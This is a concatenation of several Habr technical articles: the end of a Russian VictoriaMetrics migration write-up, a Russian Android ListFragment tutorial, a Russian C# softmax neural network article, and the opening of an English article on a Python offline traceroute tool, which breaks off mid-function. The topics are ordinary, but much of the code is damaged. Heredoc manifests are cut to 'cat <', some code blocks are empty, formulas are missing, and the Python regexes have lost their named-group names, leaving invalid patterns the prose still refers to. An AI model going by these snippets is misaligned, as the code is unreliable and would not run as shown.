* Чтобы схема заработала, необходимо между кластерами обеспечить pod-to-pod связанность без NAT (в наших облаках такая возможность есть), либо при переезде на каждый под прокинуть по сетевому балансировщику, создавая таким образом сетевую доступность между VMSelect/VMInsert и VMStorage в разных кластерах.
Взяв за основу статью [Resizing StatefulSet Persistent Volumes with zero downtime](https://www.giffgaff.io/tech/resizing-statefulset-persistent-volumes-with-zero-downtime), мы отработали схему с задачей по увеличению размера диска для VMStorage.
Ниже – упрощенный процесс без использования terraform в Яндекс Облаке:
* удаляем kind StatefulSet VMStorage оставляя “сиротские” поды без управления контроллера StatefulSet.
`k delete sts --cascade=orphan vmstorage`
* удаляем pod с самым высоким id (в нашем пример два пода, у одного имя vmstorage-0, у второго vmstorage-1). Удалять под приходится из-за того, что наше облако не дает возможность увеличить размер диска, если он примаунчен.
`k delete pod vmstorage-1`
* увеличиваем размер диска в облаке до 110G.
`yc compute disk update --size 110G --id qwerty1`
* патчим PVC, увеличивая сторадж до 110G.
`k patch pvc pvc-vm-vmstorage-1 --patch '{"spec": {"resources": {"requests": {"storage": "110Gi"}}}}'`
* деплоим StatefulSet не изменяя размер storage в storageClassName.
```
cat <
```
* повторяем пункты 1-4 д1я vmstorage-1.
* После чего деплоим манифест с увеличенным storage в storageClassName.
```
cat <
```
#### Downsampling?
Как было сказано выше, downsampling в VictoriaMetrics используется в enterprise-версии.
Хотя разработчики оставили [хак для этой фичи](https://github.com/VictoriaMetrics/VictoriaMetrics#:~:text=The%20downsampling%20can%20be%20evaluated%20for%20free%20by%20downloading%20and%20using%20enterprise%20binaries%20from%20the%20releases%20page.), мы ~~придумали очередной костыль~~ пошли своим путем: добавили отдельные группы VMAgent со scrape Interval в 5 минут (для графиков до 3х месяцев) и сохраняем в отдельную группу VMStorage c соответствующим dedup.minScrapeInterval (о причинах наличия отдельных VMStorage ниже).
Таким образом, мы делаем некое подобие downsampling. А с учетом того, что VictoriaMetrics довольно хорошо [сжимает time series](https://faun.pub/victoriametrics-achieving-better-compression-for-time-series-data-than-gorilla-317bc1f95932) — это позволяет экономить на утилизации места на диске.
Вообще, по поводу downsampling и как оно работает — есть хорошее [выступление](https://www.youtube.com/watch?v=qQN0N14HXPM&t=714s) у команды Thanos.
#### Нюансы VictoriaMetrics
* Если в Thanos для дедупликации важно, чтобы у агентов был разный external label, то для VictoriaMetrics он должен быть идентичным.
* При использовании двух VMAgent, которые скрейпят одни и те же данные, и пишут тот же набор VMStorage (точнее в VMInsert'ы, а те уже в VMStorage), стали замечать, что графики при обновлении странички начинают “скакать”. Это связано это с тем, что два VMAgent'а скрейпят одни и те же samples с дельтой по времени (т.е. не одновременно). Одно из решений - [шардирование](https://docs.victoriametrics.com/vmagent.html#scraping-big-number-of-targets). Деплоя VMAgent как statefulset и указывания уникальное значение promscrape.cluster.memberNum=%{POD\_NAME}. Второе решение - при использовании дедупликации в VMStorage и VMSelect dedup.minScrapeInterval желательно выставлять большее значение чем ScrapeInterval в VMAgent. Так же есть [issue](https://github.com/VictoriaMetrics/VictoriaMetrics/issues/2679) при работе VMAgent в разных AZ делающих scrape samples идентичных эндпоинтов (это кстати, наш случай). Данная issue решается с выставлением уникального значения [promscrape.cluster.name](http://promscrape.cluster.name) с версии v1.78.0.
Более подробно про дедупликацию описано в [документации](https://docs.victoriametrics.com/#deduplication).
* Репликация:
+ В отличии от Thanos Receiver, VMStorage не находятся в одном кластере, и вообще ничего не знаю друг о друге. Репликация time series происходит на стороне VMInsert, который и сохраняет эти данные в VMStorage. Вычисляется репликация по формуле [2*N-1*](https://docs.victoriametrics.com/Cluster-VictoriaMetrics.html#replication-and-data-safety)*, где N – это replicationFactor. То есть репликация на несколько хостов будет происходить, если replicationFactor будет больше единицы. Например: replicationFactor=1 (2\**1-1=1) – сохраняем данные на один VMStorage, replicationFactor=2 (2\*2-1=3) – сохраняем данные на три VMStorage.
+ VMInsert реплицирует данные синхронно на VMStorage (ожидает, пока данные запишутся во все VMStorage). Так что если не наберется необходимое количества нод на запись, запись не будет совершена.
+ VMSelect отправляет запросы на все VMStorage, которые указаны в параметре storageNode и ждет ответа от <количество VMStorage> - replicationFactor + 1. Такая настройка позволяет ускорить отдачу ответа, не дожидаясь ответа от VMStorage. Но replicationFactor в VMSelect работает хорошо, когда ~~все хорошо~~ на VMStorage нодах хранятся равное количество копий всех данных выставленных при replicationFactor. Но если, например, вы вывели на обслуживание ноды с VMStorage или добавили новые – вы можете получать пропуски данных на графиках. На это есть [issue](https://github.com/VictoriaMetrics/VictoriaMetrics/issues/1207). Поэтому в таких случаях лучше убрать параметр replicationFactor из VMSelect, чтобы VMSelect дожидался ответа от всех VMStorage нод перед отправкой ответа на запрос.
+ Чем больше replicationFactor, тем больше потребуется ресурсов [CPU, RAM и места на диске](https://docs.victoriametrics.com/Cluster-VictoriaMetrics.html#replication-and-data-safety).
* VMInsert и VMStorage сжимают данные перед отправкой их, что естественно, сказывается на утилизации CPU. Если вы сильно ограничены в ресурсах CPU, отключить это поведение можно через аргумент -rpc.disableCompression.
* Для деплоя в Kubernetes в компании используются как кастомные написанные helm-чарты, так и вендорные, в которых используется kind [ServiceMonitor](https://github.com/prometheus-operator/prometheus-operator/blob/main/Documentation/design.md#servicemonitor) для service discovery в prometheus. VMAgent не умеет работать с данным типом CRD. Мы не стали переписывать наши кастомные чарты (и тем более вендорные), а просто задеплоили VMOpertor который умеет конвертировать CR ServiceMonitor в сущности VictoriaMetrics. Это не отменяет того факта, что [CRD ServiceMonitor](https://github.com/prometheus-community/helm-charts/blob/main/charts/kube-prometheus-stack/crds/crd-servicemonitors.yaml) необходимо задеплоить в Kubernetes, так как данное CRD не идет в поставке с VictoriaMetrics). Данная функциональность облегчает переезд с Prometheus на VictoriaMetrics.
### Профит от миграции
Изначально для переезда мы рассматривали стек VMAgent + Thanos Receiver, но он не подошел нам по ряду причин – тех самых нюансов, которые в нашем случае были важны. Критичным оказалось наличие механизма backfilling, который есть из коробки в VictoriaMetrics, куда мы в итоге и мигрировали. VictoriaMetrics подкупила еще более простой архитектурой.
В результате миграции мы снизили затраты на ресурсы по RAM примерно в два раза; по CPU — примерно в полтора раза; на сторадж — примерно в три раза. Это произошло по той причине, что в Object Storage взимается плата не только за хранение данных, но и за количество запросов. В нашем случае, переход на диски привел к экономии ресурсов.
Также бонусом мы получили отдачу метрик быстрее — примерно на секунды 2-3 (проверяли на графиках нашей инфраструктурной команды), в сравнении со схемой с Thanos Sidecar.
На данный момент экономия составила порядка 60 000 рублей в месяц. По времени исследование заняло около двух с половиной недель. Так что примерно через 3-4 месяца данное решение должно окупиться.
Возможно, в вашем случае результаты могут отличаться, потому что количество метрик, частота поиска, задачи, да и инфраструктура от проекта к проекту не идентичны. Надеюсь, наш опыт будет вам полезен. | https://habr.com/ru/post/672908/ | null | ru | null |
# Используем стандартные элементы ListFragment по назначению
В одном из проектов столкнулся с тем, что в приложении нужно было отображать списки результатов для различных запросов (поиск по словам, датам, тегам и т.п.). Так как списки повторялись в разных Activity, самым очевидным решением было использовать фрагменты, а конкретно создать свой класс ListFragment и повторно использовать его в проекте.

ListFragment как раз предназначен для отображения различных списков и примечателен тем, что имеет свои поля и методы для работы со списком, а также XML-разметку с минимальным набором представлений. Благодаря всему этому, мы можем даже не создавать свою XML-разметку для фрагмента, используя стандартную.
Прежде, чем начать работать с ListFragment, давайте немного изучим, что же находится внутри?
По умолчанию используется разметка из ~\sdk\platforms\android-XX\data\res\layout\list-content.xml
У некоторых представлений этой разметки имеются идентификаторы, благодаря которым мы можем кастомизировать родительский контейнер, список и текст пустого списка.
Если пробежаться по исходникам класса ListFragment, мы увидим:
```
View mListContainer; // родительский контейнер (идентификатор R.id.listContainer)
final private AdapterView.OnItemClickListener mOnClickListener // "слушатель" клика на элемент списка
ListAdapter mAdapter; // адаптер списка
ListView mList; // представление списка (идентификатор android.R.id.list)
TextView mEmptyView; // текстовое представление для случая пустого списка, будем называть его empty-текст (идентификатор android.R.id.empty)
View mProgressContainer; // представление для анимации загрузки
```
Итак, создадим наш класс:
```
import android.app.ListFragment;
public class MyListFragment extends ListFragment{
}
```
И включим его в разметку нашего Activity (либо можно установить фрагмент программно)
```
```
Запускаем приложение, переходим к нашему Activity и сразу же видим анимацию загрузки:

Теперь, для того, чтобы скрыть анимацию и отобразить список, нам достаточно установить адаптер вызвав метод setAdapter(ListAdapter adapter). В этом проекте я использовал Loader в Activity и OttoBus событие, но вариантов передать объект списка во фрагмент предостаточно, поэтому прошу не обращать внимание на сам метод.
```
@Subscribe
public void onMyEvent(MyEvent loaderEvent) throws InterruptedException {
String[] listItems = {"item 1", "item 2", "item 3","item 4"}; // пример списка
Thread.sleep(2000); // имитация времени загрузки
ArrayAdapter mArrayAdapter = new ArrayAdapter(getActivity(), android.R.layout.simple_list_item_1, listItems); // адаптер списка
setListAdapter(mArrayAdapter); // установка адаптера
}
```
Сразу после установки адаптера анимация исчезнет и мы увидим:

А если наш список вдруг окажется пустым, то получим другой экран:

Для установки своего empty-текста используется метод:
```
setEmptyText(getResources().getString(R.string.error));
```
Также в классе ListFragment имеется метод обработки нажатий списка, который мы можем переопределить
```
@Override
public void onListItemClick(ListView l, View v, int position, long id) {
// ваш ход господа
}
```
Вы можете не использовать стандартную разметку, и задать свою, но не забудьте указать правильные идентификаторы вашим представлениям.
Итого. ListFragment имеет свои представления и логику работы.
Надеюсь эта статья позволит вам принять оценить, достаточно ли вам встроенной реализации или же нужно писать свою.
P.S. Лично мне понравилась простота и скорость внедрения в проект, где я смог успешно использовать один класс фрагмента сразу в 4х различных Activity.
Плюсы:
\* Не обязательно создавать XML-разметку.
\* Нет необходимости объявлять представления в вашем классе.
\* Не нужно реализовывать логику показа/скрытия анимации, списка и empty-текста.
\* Не нужна установка «слушателя»
\* Меньше кода.
Минусы:
\* Нужно изучить методы класса ListFragment и как все работает.
\* Нельзя изменить встроенную анимацию даже через собственную разметку.
\* Нельзя переопределить логику скрытия/показа анимации, списка и empty-текста.
P.S. Присоединяйтесь к [чату русскоязычных Android разработчиков](https://gitter.im/rus-speaking/android). | https://habr.com/ru/post/246199/ | null | ru | null |
# Нейронная сеть с SoftMax слоем на c#
Привет, [в прошлой статье](http://habrahabr.ru/post/154369/) я рассказал про алгоритм обратного распространения ошибки и привел реализацию, не зависящую от функции ошибки и от функции активации нейрона. Было показано несколько простых примеров подмены этих самых параметров: минимизация квадрата Евклидова расстояния и логарифмического правдоподобия для сигмоидной функции и гиперболического тангенса. Данный пост будет логическим продолжение прошлого, в котором я рассмотрю немного нестандартный пример, а именно [функцию активации Softmax](http://en.wikipedia.org/wiki/Softmax_activation_function) для минимизации [перекрестной энтропии](http://en.wikipedia.org/wiki/Cross_entropy). Эта модель актуальна при задаче классификации, когда необходимо получить на выходе нейросети вероятности принадлежности входного образа одному из не пересекающихся классов. Очевидно, что суммарный выход сети по всем нейронам выходного слоя должен равняться единице (так же как и для выходных образов обучающей выборки). Однако не достаточно просто нормализировать выходы, а нужно заставить сеть моделировать вероятностное распределение, и обучать ее именно этому. Кстати, сейчас на [coursera.org](https://www.coursera.org/) идёт [курс по нейросетям](https://class.coursera.org/neuralnets-2012-001/), именно он помог углубиться в понимание софтмакса, иначе я продолжал бы использовать сторонние реализации.
#### Using
Рекомендую ознакомиться с [предыдущим постом](http://habrahabr.ru/post/154369/), так как все обозначения, интерфейсы и сам алгоритм обучения без изменений используются и здесь.
#### Функция активации softmax
Итак, первая задача, которая стоит перед нами, — это обеспечить способ моделирования сетью вероятностного распределения. Для этого создадим сеть прямого распространения, такую что:
* сеть содержит некоторое количество скрытых слоев, все нейроны могут иметь свою собственную функцию активации;
* на последнем слое находится такое количество нейронов, которое соответствует количеству классов; все эти нейроны будут называться softmax слоем или группой.
Нейроны softmax-группы будут иметь [следующую функцию активации](http://en.wikipedia.org/wiki/Softmax_activation_function) (в этом разделе я буду опускать индекс слоя, подразумевается, что он последний и содержит **n** нейронов):
* , для **i**-ого нейрона
Из формулы видно, что выход каждого нейрона зависит от сумматоров всех остальных нейронов softmax группы, а сумма выходных значений всей группы равняется единице. Прелесть данной функции и в том, что частная производная i-ого нейрона по своему сумматору равна:
* 
Реализуем эту функцию, используя интерфейс **IFunction** из [предыдущей статьи](http://habrahabr.ru/post/154369/):
**Реализация softmax функции**Стоит отметить, что реализация метода `double Compute(double x)` вообще говоря не обязательна, так как вычисление выходных значений группы будет дешевле сделать в реализации softmax слоя. Но для полноты картины, да и на всякий случай пусть будет -)
```
internal class SoftMaxActivationFunction : IFunction
{
private ILayer _layer = null;
private int _ownPosition = 0;
internal SoftMaxActivationFunction(ILayer layer, int ownPosition)
{
_layer = layer;
_ownPosition = ownPosition;
}
public double Compute(double x)
{
double numerator = Math.Exp(x);
double denominator = numerator;
for (int i = 0; i < _layer.Neurons.Length; i++)
{
if (i == _ownPosition)
{
continue;
}
denominator += Math.Exp(_layer.Neurons[i].LastNET);
}
return numerator/denominator;
}
public double ComputeFirstDerivative(double x)
{
double y = Compute(x);
return y*(1 - y);
}
public double ComputeSecondDerivative(double x)
{
throw new NotImplementedException();
}
}
```
#### Функция ошибки
На каждом обучающем примере мы будем получать выход сети, который моделирует нужное нам вероятностное распределение, а для сравнения двух вероятностных распределений необходима корректная мера. В качестве такой меры будет использоваться [перекрестная энтропия](http://en.wikipedia.org/wiki/Cross_entropy):
* 
* **t** — требуемые выходы для текущего обучающего примера
* **y** — реальные выходы нейросети
А общая ошибка сети вычисляется как:

Чтобы осознать элегантность всей модели, необходимо увидеть, как вычисляется градиент по одной из выходных размерностей или нейрону. В [предыдущем посте](http://habrahabr.ru/post/154369/) в разделе «выходной слой» описано то, что задача сводится к вычислению dC/dz\_i, продолжим с этого момента:
* , т.к. выход каждого нейрона содержит сумматор текущего, нам приходится продифференцировать всю сумму. В связи с тем, что функция стоимости зависит только от выходов нейронов, а выходы только от сумматоров, то можно разложить на две частные производные. Далее рассмотрим по отдельности каждый член суммы (главное обращать внимание на индексы, в нашем случае **j** пробегает по нейронам softmax группы, а **i** — это текущий нейрон)
* 
---
* 
---
* 
---
* 
Последнее преобразование получается благодаря тому, что сумма значений выходного вектора должна равняться единице, по свойству нейронов softmax-группы. Это важное требование к обучающей выборке, иначе градиент будет подсчитан не верно!
Перейдем к реализации, используя то же представление, что и раньше:
**Реализация перекрестной энтропии**
```
internal class CrossEntropy : IMetrics
{
internal CrossEntropy()
{
}
///
/// \sum\_i v1\_i \* ln(v2\_i)
///
public override double Calculate(double[] v1, double[] v2)
{
double d = 0;
for (int i = 0; i < v1.Length; i++)
{
d += v1[i]\*Math.Log(v2[i]);
}
return -d;
}
public override double CalculatePartialDerivaitveByV2Index(double[] v1, double[] v2, int v2Index)
{
return v2[v2Index] - v1[v2Index];
}
}
```
#### Softmax слой
Вообще говоря, особый слой можно и не делать, просто в конструкторе обыкновенной сети прямого распространения создавать последний слой, с функцией активации приведенной выше, и передавать ей в конструктор ссылку на софтмакс слой, но тогда при вычислении выхода каждого нейрона каждый раз будет высчитываться знаменатель функции активации, но если реализовать метод `double[] ComputeOutput(double[] inputVector)` нейросети должным образом:
```
public double[] ComputeOutput(double[] inputVector)
{
double[] outputVector = inputVector;
for (int i = 0; i < _layers.Length; i++)
{
outputVector = _layers[i].Compute(outputVector);
}
return outputVector;
}
```
то из-за того, что сеть не вызывает метод Compute нейрона напрямую, а делегирует эту функцию слою, можно сделать так, чтобы знаменатель функции активации вычислялся один раз.
**Softmax слой**
```
internal class SoftmaxFullConnectedLayer : FullConnectedLayer
{
internal SoftmaxFullConnectedLayer(int inputDimension, int size)
{
_neurons = new INeuron[size];
for (int i = 0; i < size; i++)
{
IFunction smFunction = new SoftMaxActivationFunction(this, i);
_neurons[i] = new InLayerFullConnectedNeuron(inputDimension, smFunction);
}
}
public override double[] Compute(double[] inputVector)
{
double[] numerators = new double[_neurons.Length];
double denominator = 0;
for (int i = 0; i < _neurons.Length; i++)
{
numerators[i] = Math.Exp(_neurons[i].NET(inputVector));
denominator += numerators[i];
}
double[] output = new double[_neurons.Length];
for (int i = 0; i < _neurons.Length; i++)
{
output[i] = numerators[i]/denominator;
_neurons[i].LastState = output[i];
}
return output;
}
}
```
#### Итог
Итак, недостающие детали готовы, и можно собирать [конструктор](http://ru.wikipedia.org/wiki/Конструктор_(игрушка)). Я, например, использую одну и ту же реализацию сети прямого распространения, просто с другим [конструктором](http://ru.wikipedia.org/wiki/Конструктор_(программирование)).
**Пример конструктора**
```
///
/// Creates network with softmax layer at the outlut, and hidden layes with theirs own activation functions
///
internal FcMlFfNetwork(int inputDimension,
int outputDimension,
int[] hiddenLayerStructure,
IFunction[] hiddenLayerFunctions,
IWeightInitializer wi,
ILearningStrategy trainingAlgorithm)
{
\_learningStrategy = trainingAlgorithm;
\_layers = new ILayer[hiddenLayerFunctions.Length + 1];
\_layers[0] = new FullConnectedLayer(inputDimension, hiddenLayerStructure[0], hiddenLayerFunctions[0]);
for (int i = 1; i < hiddenLayerStructure.Length; i++)
{
\_layers[i] = new FullConnectedLayer(\_layers[i - 1].Neurons.Length, hiddenLayerStructure[i], hiddenLayerFunctions[i]);
}
//create softmax layer
\_layers[hiddenLayerStructure.Length] = new SoftmaxFullConnectedLayer(hiddenLayerStructure[hiddenLayerStructure.Length - 1], outputDimension);
for (int i = 0; i < \_layers.Length; i++)
{
for (int j = 0; j < \_layers[i].Neurons.Length; j++)
{
\_layers[i].Neurons[j].Bias = wi.GetWeight();
for (int k = 0; k < \_layers[i].Neurons[j].Weights.Length; k++)
{
\_layers[i].Neurons[j].Weights[k] = wi.GetWeight();
}
}
}
}
``` | https://habr.com/ru/post/155235/ | null | ru | null |
# Implementing Offline traceroute Tool Using Python
Hey everyone! This post was born from a question asked by an IT forum member. The summary of the question looked as follows:
* There is a set of text files containing routing tables collected from various network devices.
* Each file represents one device.
* Device platforms and routing table formats may vary.
* It is required to analyze a routing path from any device to an arbitrary subnet or host on-demand.
* Resulting output should contain a list of routing table entries that are used for the routing to the given destination on each hop.
The one who asked a question worked as a TAC engineer. It is often that they collect or receive from the customers some text 'snapshots' of the network state for further offline analysis while troubleshooting the issues. Some automation could really save a lot of time.
I found this task interesting and also applicable to my own needs, so I decided to write a Proof-of-Concept implementation in Python 3 for Cisco IOS, IOS-XE, and ASA routing table format.
In this article, I’ll try to reconstruct the resulting script development process and my considerations behind each step.
Let’s get started.
Disclaimer
----------
```
This is a translation of my original article in Russian I posted in June 2018.
If you are willing to help to improve the translation, please DM me.
All listed code is published under MIT license and does not provide guarantees of
any kind.
The solution is written in Python 3.7.
An understanding of the programming and networking basics is desirable for reading.
If you found a typo, please use Ctrl+Enter or ⌘+Enter to send it to the author.
```
Task Decomposition and Requirements Analysis
============================================
Considering the initial task summary, I would split it into two main parts:
* Extracting the routing tables from the text files into some representation in Python data structures.
* Analyzing routing paths based on that pre-processed routing data.
Such logic separation will allow us to import the routing data from different sources (e.g. APIs or SNPM) and not limiting the potential scope to text file input.
To improve route lookup performance, it is necessary to initialize the files just once on script startup.
The solution will support Cisco IOS, IOS-XE, and ASA routing table output format for IPv4. Extensibility logic applies here as well.
As we know, a route selection during routing table lookup relies on a Longest Prefix Match (LPM) logic. Unlike with Access Control lists, it is not enough to pick the first match. We have to find the most specific one.
Fortunately, there are fast algorithms and approaches for LPM calculation. One of them is building a so-called prefix tree (prefix trees may also be referenced to as Subnet Tries, Patricia Tries, or Radix Trees in the general case) based on a routing table.
In prefix trees, the lookup speed does not depend on the tree size (the number of prefixes), it only depends on a tree depth (maximum prefix length) which is a maximum of 32 for IPv4 (programmers would say that the search time complexity is O(k), where *k* is the maximum prefix length). In other words, route lookup using prefix trees will work with the same average speed on routing tables containing 500 and 500,000 routes.
Initial tree building time does linearly depend on a number of prefixes and their length (programmers would say that the build time complexity is O(n\*k) where *n* is the number of prefixes and *k* is the maximum prefix length), but we do this just once. Any subsequent search request will work super fast.
```
A detailed explanation of this algorithm deserves a dedicated article.
Please let me know if you are interested.
```
As we are not limited in usage of an external dependencies, we can use some existing Python library implementing this. Some of them are:
* [SubnetTree](https://pypi.org/project/pysubnettree/). I wrote my original solution based on this library. It works really fast. But its internal code is written in C++ which causes some compatibility issues and dependency hell across operating systems.
* [PyTricia](https://github.com/jsommers/pytricia). This library looks best in terms of performance and compatibility in early 2021. It is written in C, so it should work more seamlessly in different OSs. So I migrated my solution to this library. Thanks to the selected code design, it was a matter of a few changed lines of code.
We should also keep in mind that the analyzed network segment may contain routing loops. They should be detected. It should not break the script execution.
The routers may also have no route to the destination. That’s another point to note.
Routing tables for [VRF](https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Network_Virtualization/PathIsol.html#wp80043)s, if present, should be saved into dedicated text files as each VRF instance represents a separate logical device from the routing and topology perspective.
Hardware performance limitations for script execution, the potential size of the routing tables and the network segments were not in a list of initial requirements. However, let’s take them into account.
Most modern network platforms support over 1M routing entries on average. IPv4 BGP Full View size is around 814,000 prefixes as of January 2021.
My rough estimations and tests showed that in-memory processing of each 1M prefixes requires ~500MB of RAM for this scenario. Even a mid-level laptop with 8GB RAM should allow you to process a topology consisting of 17-18 routers with Full View on each of them (~12-13M prefixes in total). I believe this is enough for most of the cases. For larger network segments, the analysis can either be split into smaller scopes or moved into an external out-of-memory database.
~~640 kB ought to be enough for anybody.~~ Let's stick on an in-memory processing option.
Parsing Source Files and Selecting Data Structures
--------------------------------------------------
Let's store all our text files with routing tables in a separate variable-defined sub-directory:
```
RT_DIRECTORY = "./routing_tables"
```
Here is a reference of IOS and IOS-XE routing table output format:
**show ip route**
```
S* 0.0.0.0/0 [1/0] via 10.220.88.1
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 10.220.88.0/24 is directly connected, FastEthernet4
L 10.220.88.20/32 is directly connected, FastEthernet4
1.0.0.0/32 is subnetted, 1 subnets
S 1.1.1.1 [1/0] via 212.0.0.1
[1/0] via 192.168.0.1
D EX 10.1.198.0/24 [170/1683712] via 172.16.209.47, 1w2d, Vlan910
[170/1683712] via 172.16.60.33, 1w2d, Vlan60
[170/1683712] via 10.25.20.132, 1w2d, Vlan220
[170/1683712] via 10.25.20.9, 1w2d, Vlan20
4.0.0.0/16 is subnetted, 1 subnets
O E2 4.4.0.0 [110/20] via 194.0.0.2, 00:02:00, FastEthernet0/0
5.0.0.0/24 is subnetted, 1 subnets
D EX 5.5.5.0 [170/2297856] via 10.0.1.2, 00:12:01, Serial0/0
6.0.0.0/16 is subnetted, 1 subnets
B 6.6.0.0 [200/0] via 195.0.0.1, 00:00:04
172.16.0.0/26 is subnetted, 1 subnets
i L2 172.16.1.0 [115/10] via 10.0.1.2, Serial0/0
172.20.0.0/32 is subnetted, 3 subnets
O 172.20.1.1 [110/11] via 194.0.0.2, 00:05:45, FastEthernet0/0
O 172.20.3.1 [110/11] via 194.0.0.2, 00:05:45, FastEthernet0/0
O 172.20.2.1 [110/11] via 194.0.0.2, 00:05:45, FastEthernet0/0
10.0.0.0/8 is variably subnetted, 5 subnets, 3 masks
C 10.0.1.0/24 is directly connected, Serial0/0
D 10.0.5.0/26 [90/2297856] via 10.0.1.2, 00:12:03, Serial0/0
D 10.0.5.64/26 [90/2297856] via 10.0.1.2, 00:12:03, Serial0/0
D 10.0.5.128/26 [90/2297856] via 10.0.1.2, 00:12:03, Serial0/0
D 10.0.5.192/27 [90/2297856] via 10.0.1.2, 00:12:03, Serial0/0
192.168.0.0/32 is subnetted, 1 subnets
D 192.168.0.1 [90/2297856] via 10.0.1.2, 00:12:03, Serial0/0
O IA 195.0.0.0/24 [110/11] via 194.0.0.2, 00:05:45, FastEthernet0/0
O E2 212.0.0.0/8 [110/20] via 194.0.0.2, 00:05:35, FastEthernet0/0
C 194.0.0.0/16 is directly connected, FastEthernet0/0
```
Cisco ASA looks very similar. The difference is ASA displays full subnet masks instead of prefix lengths:
**show route**
```
S 10.1.1.0 255.255.255.0 [3/0] via 10.86.194.1, outside
C 10.86.194.0 255.255.254.0 is directly connected, outside
S* 0.0.0.0 0.0.0.0 [1/0] via 10.86.194.1, outside
```
The examples show that, despite the multitude of options, all routing table entries have a predictable format. So they can be processed with regular expressions.
There are two common groups based on route entry format: *Local+Connected* types and all the rest.
The existence of multi-line routes for multi-path routing cases makes them harder to extract. We can not use simple line iteration through the content of the files because of that. One of the workarounds is to iterate through regular expression matches covering multiple lines.
Let's write such regular expressions:
```
# Local and Connected route strings matching.
REGEXP_ROUTE_LOCAL_CONNECTED = re.compile(
r'^(?P[L|C])\s+'
+ r'((?P\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)'
+ r'\s?'
+ r'(?P(\/\d\d?)?'
+ r'|(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)?))'
+ r'\ is\ directly\ connected\,\ '
+ r'(?P\S+)',
re.MULTILINE
)
# Static and dynamic route strings matching.
REGEXP\_ROUTE = re.compile(
r'^(\S\S?\\*?\s?\S?\S?)'
+ r'\s+'
+ r'((?P\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)'
+ r'\s?'
+ r'(?P(\/\d\d?)?'
+ r'|(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)?))'
+ r'\s\*'
+ r'(?P(?:\n?\s+(\[\d\d?\d?\/\d+\])\s+'
+ r'via\s+(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?)(.\*)\n?)+)',
re.MULTILINE
)
```
Both regular expressions contain ([named groups](https://docs.python.org/2/library/re.html)) to make them more readable and maintainable.
You can reference the named group value within the regular expression match by its key: *subnet*/*interface*/*maskOrPrefixLength* for the prefix info and *viaPortion*/*interface* for the route destination info in our case.
The regular expression covers subnet mask and prefix length representations at once. It can be extracted by *maskOrPrefixLength* key. For a further processing, let's bring it to a common format of the prefix length as it is shorter:
```
def convert_netmask_to_prefix_length(mask_or_pref):
"""
Gets subnet_mask (XXX.XXX.XXX.XXX) of /prefix_length (/XX).
For subnet_mask, converts it to /prefix_length and returns the result.
For /prefix_length, returns as is.
For empty input, returns "" string.
"""
if not mask_or_pref:
return ""
if re.match(r"^\/\d\d?$", mask_or_pref):
return mask_or_pref
if re.match(r"^\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?$",
mask_or_pref):
return (
"/"
+ str(sum([bin(int(x)).count("1") for x in mask_or_pref.split(".")]))
)
return ""
```
Let's also write a regular expression for next-hop extraction from the *viaPortion* group and a regular expression for IPv4 address format check in a file and user input:
```
# Route string VIA portion matching.
REGEXP_VIA_PORTION = re.compile(
r'.*via\s+(\d\d?\d?\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?).*'
)
# RegEx template string for IPv4 address matching.
REGEXP_IPv4_STR = (
r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
+ r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
)
# IPv4 CIDR notation matching in user input.
REGEXP_INPUT_IPv4 = re.compile(r"^" + REGEXP_IPv4_STR + r"(\/\d\d?)?$")
```
Now let's translate our network representation into Python data structures.
All the prefixes we extract from the routing tables will be used as prefix tree keys. Each prefix tree object will be inherited from the *PyTricia* module. Search result on a prefix tree will return a list of available next-hops and a full-text representation of the matched routing entry. Another list will store a list of local interfaces with their IP-addresses for each router.
Each router will be represented by a dictionary object containing all above.
```
# Example data structures
route_tree = pytricia.PyTricia()
route_tree[’subnet’] = ((next_hop_1, next_hop_n), raw_route_string)
interface_list = ((interface_1, ip_address_1), (interface_n, ip_address_n))
connected_networks = ((interface_1, subnet_1), (interface_n, subnet_n))
router = {
‘routing_table’: route_tree,
‘interface_list’: interface_list,
‘connected_networks’: connected_networks,
}
```
Now we can implement a route lookup function:
```
def route_lookup(destination, router):
if destination in router['routing_table']:
return router['routing_table'][destination]
else:
return (None, None)
```
To distinguish between the routers, it is important to assign some unique router identifier (RID) for each of them. Router ID generation and selection algorithms might be different. In our case, let's use a filename as a RID for simplicity.
Let's put all resulting routers into a dictionary with RIDs as keys and corresponding router objects as values:
```
ROUTERS = {
‘router_id_1’: router_1,
‘router_id_n’: router_n,
}
```
We also need to implement some next-hop RID resolution mechanism by known next-hop IP-address (think of ARP).
Let's create one more prefix tree containing IP-addresses of all discovered router as keys and RID with interface types as corresponding values:
```
# Example
GLOBAL_INTERFACE_TREE = pytricia.PyTricia()
GLOBAL_INTERFACE_TREE[‘ip_address’] = (router_id, interface_type)
# Returns RouterID by Interface IP address which it belongs to.
def get_rid_by_interface_ip(interface_ip):
if interface_ip in GLOBAL_INTERFACE_TREE:
return GLOBAL_INTERFACE_TREE[interface_ip][0]
```
Now let's combine our IOS/IOS-XE/ASA format parsers into a single function. It will take a text routing table as an input and return a router dictionary object of a format we discussed earlier:
```
def parse_show_ip_route_ios_like(raw_routing_table):
"""
Parser for routing table text output.
Compatible with both Cisco IOS(IOS-XE) 'show ip route'
and Cisco ASA 'show route' output format.
Processes input text file and write into Python data structures.
Builds internal PyTricia search tree in 'route_tree'.
Generates local interface list for a router in 'interface_list'
Returns 'router' dictionary object with parsed data.
"""
router = {}
route_tree = pytricia.PyTricia()
interface_list = []
# Parse Local and Connected route strings in text.
for raw_route_string in REGEXP_ROUTE_LOCAL_CONNECTED.finditer(raw_routing_table):
subnet = (
raw_route_string.group('ipaddress')
+ convert_netmask_to_prefix_length(
raw_route_string.group('maskOrPrefixLength')
)
)
interface = raw_route_string.group('interface')
route_tree[subnet] = ((interface,), raw_route_string.group(0))
if raw_route_string.group('routeType') == 'L':
